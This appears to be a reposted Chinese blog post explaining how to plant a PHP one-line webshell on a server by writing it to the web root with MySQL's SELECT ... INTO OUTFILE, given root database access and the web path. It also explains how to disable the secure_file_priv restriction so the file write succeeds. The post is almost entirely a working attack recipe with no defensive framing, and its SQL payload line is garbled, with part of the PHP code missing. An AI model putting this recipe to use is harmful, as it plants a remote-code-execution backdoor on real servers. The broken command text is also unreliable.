通过mysql写入php一句话木马

 利用mysql写入一句话木马

前提:

  root权限,知道了服务器的web的绝对路径

select "$_POST['pass']);?>" INTO OUTFILE "D:\\WWW\\22.php"

如果执行成功,生成D:\WWW\22.php,并写入

eval($_POST['pass']);?>

如果出现:

  提示错误[Error Code] 1290 - The MySQL server is running with the --secure-file-priv option解决办法

是mysql设置的权限的问题

mysql对通过文件导入导出作了限制,默认不允许

show variables like '%secure%';

修改my.ini

secure_auth = ON
secure_file_priv = ""

注意: 

  1、绝对路径的猜解

  2、INTO OUTFILE 后面的"D:\\WWW\\22.php"(对反斜杠做了一次转义)

 

转载于:https://www.cnblogs.com/baby123/p/10432205.html

你可能感兴趣的:(通过mysql写入php一句话木马)